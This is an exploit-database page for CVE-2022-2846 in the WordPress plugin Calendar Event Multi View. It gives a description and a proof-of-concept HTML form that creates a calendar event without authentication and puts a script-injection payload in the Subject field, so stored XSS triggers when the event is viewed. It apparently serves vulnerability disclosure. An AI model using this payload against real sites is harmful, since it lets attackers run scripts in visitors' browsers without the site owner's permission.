Vulners
Lucene search
Calendar Event Multi View 1.4.07 Cross Site Scripting
🗓️ 05 Apr 2023 00:00:00Reported by Mostafa FarzanehType 
packetstorm🔗 packetstormsecurity.com👁 239 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to XSS Vulnerability | 5 Apr 202300:00 | – | zdt |
 | CVE-2022-2846 | 16 Aug 202222:39 | – | circl |
 | WordPress plugin Calendar Event Multi View 跨站请求伪造漏洞 | 16 Aug 202200:00 | – | cnnvd |
 | CVE-2022-2846 | 16 Aug 202200:00 | – | cve |
 | CVE-2022-2846 Calendar Event Multi View < 1.4.07 - Unauthenticated Arbitrary Event Creation to Stored XSS | 16 Aug 202200:00 | – | cvelist |
 | Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS) | 5 Apr 202300:00 | – | exploitdb |
 | EUVD-2022-35080 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-2846 | 16 Aug 202219:15 | – | nvd |
 | Cross site scripting | 16 Aug 202219:15 | – | prion |
 | PT-2022-19041 · WordPress · Calendar Event Multi View | 16 Aug 202200:00 | – | ptsecurity |
10
`# Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)
# Date: 2022-05-25
# Exploit Author: Mostafa Farzaneh
# WPScan page:
https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c
# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/
# Software Link:
https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip
# Version: 1.4.06
# Tested on: Linux
# CVE : CVE-2022-2846
# Description:
The Calendar Event Multi View WordPress plugin before 1.4.07 does not have
any authorisation and CSRF checks in place when creating an event, and is
also lacking sanitisation as well as escaping in some of the event fields.
This could allow unauthenticated attackers to create arbitrary events and
put Cross-Site Scripting payloads in it.
#POC and exploit code:
As an unauthenticated user, to add a malicious event (on October 6th, 2022)
to the calendar with ID 1, open the code below
<html>
<body>
<form action="
https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"
method="POST">
<input type="hidden" name="Subject"
value='"><script>alert(/XSS/)</script>' />
<input type="hidden" name="colorvalue" value="#f00" />
<input type="hidden" name="rrule" value="" />
<input type="hidden" name="rruleType" value="" />
<input type="hidden" name="stpartdate" value="10/6/2022" />
<input type="hidden" name="stparttime" value="00:00" />
<input type="hidden" name="etpartdate" value="10/6/2022" />
<input type="hidden" name="etparttime" value="00:00" />
<input type="hidden" name="stpartdatelast" value="10/6/2022" />
<input type="hidden" name="etpartdatelast" value="10/6/2022" />
<input type="hidden" name="stparttimelast" value="" />
<input type="hidden" name="etparttimelast" value="" />
<input type="hidden" name="IsAllDayEvent" value="1" />
<input type="hidden" name="Location" value="CSRF" />
<input type="hidden" name="Description" value='<p style="text-align:
left;">CSRF</p>' />
<input type="hidden" name="timezone" value="4.5" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The XSS will be triggered when viewing the related event
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Apr 2023 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 3.14.3
EPSS0.03049
SSVC